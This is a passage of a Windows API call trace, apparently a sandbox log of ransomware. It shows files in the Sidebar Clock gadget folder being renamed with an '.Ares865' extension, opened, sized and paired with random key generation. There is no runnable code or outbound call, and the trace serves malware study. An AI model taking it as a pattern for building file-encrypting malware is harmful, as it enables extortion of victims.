sidebar\\gadgets\\clock.gadget\\images\\settings_right_pressed.png.ares865"), dwFlags=0x1) returned 1 [0119.160] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_pressed.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.161] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1119) returned 1 [0119.161] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.162] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.162] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.164] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.165] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.165] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.165] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.Ares865") returned 98 [0119.165] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_rest.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_rest.png.ares865"), dwFlags=0x1) returned 1 [0119.167] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_rest.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.167] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=856) returned 1 [0119.167] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.168] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.168] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.170] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.171] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.171] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.171] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.Ares865") returned 96 [0119.171] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\spacer_highlights.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\spacer_highlights.png.ares865"), dwFlags=0x1) returned 1 [0119.172] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\spacer_highlights.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.172] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=288) returned 1 [0119.173] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.173] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.173] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.177] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.178] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.178] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.179] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.Ares865") returned 85 [0119.179] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square.png.ares865"), dwFlags=0x1) returned 1 [0119.180] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.180] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20140) returned 1 [0119.181] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.181] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.181] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.185] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.185] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.185] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.186] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.Ares865") returned 89 [0119.186] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_dot.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_dot.png.ares865"), dwFlags=0x1) returned 1 [0119.187] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_dot.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.188] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=240) returned 1 [0119.188] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.189] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.189] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.337] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.338] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.338] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.338] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.Ares865") returned 87 [0119.338] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_h.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_h.png.ares865"), dwFlags=0x1) returned 1 [0119.341] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_h.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.341] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=475) returned 1 [0119.342] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.342] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.342] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.345] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.345] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.345] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.346] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.Ares865") returned 87 [0119.346] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_m.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_m.png.ares865"), dwFlags=0x1) returned 1 [0119.347] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_m.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.348] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=458) returned 1 [0119.348] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.348] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.349] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.352] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.352] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.352] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.353] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.Ares865") returned 87 [0119.353] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_s.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_s.png.ares865"), dwFlags=0x1) returned 1 [0119.355] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_s.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.355] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3119) returned 1 [0119.355] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.356] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.356] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.366] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.367] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.367] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.367] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.Ares865") returned 94 [0119.367] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_settings.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_settings.png.ares865"), dwFlags=0x1) returned 1 [0119.369] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_settings.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.369] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19847) returned 1 [0119.369] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.370] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.370] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.373] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.374] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.374] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.374] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.Ares865") returned 85 [0119.374] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system.png.ares865"), dwFlags=0x1) returned 1 [0119.376] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.376] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20891) returned 1 [0119.377] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.377] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.377] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.383] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.384] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.384] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.385] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.Ares865") returned 89 [0119.385] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_dot.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_dot.png.ares865"), dwFlags=0x1) returned 1 [0119.386] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_dot.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.386] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=243) returned 1 [0119.386] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.387] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.387] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.390] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.390] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.390] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.391] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.Ares865") returned 87 [0119.391] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_h.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_h.png.ares865"), dwFlags=0x1) returned 1 [0119.393] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_h.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.393] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=206) returned 1 [0119.393] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.394] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.394] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.397] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.397] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.398] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.398] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.Ares865") returned 87 [0119.398] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_m.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_m.png.ares865"), dwFlags=0x1) returned 1 [0119.399] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_m.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.399] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=206) returned 1 [0119.400] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.400] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.400] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.403] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.404] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.404] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.404] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.Ares865") returned 87 [0119.404] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_s.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_s.png.ares865"), dwFlags=0x1) returned 1 [0119.406] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_s.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.406] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3003) returned 1 [0119.406] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.407] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.407] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.413] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.414] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.414] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.414] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows 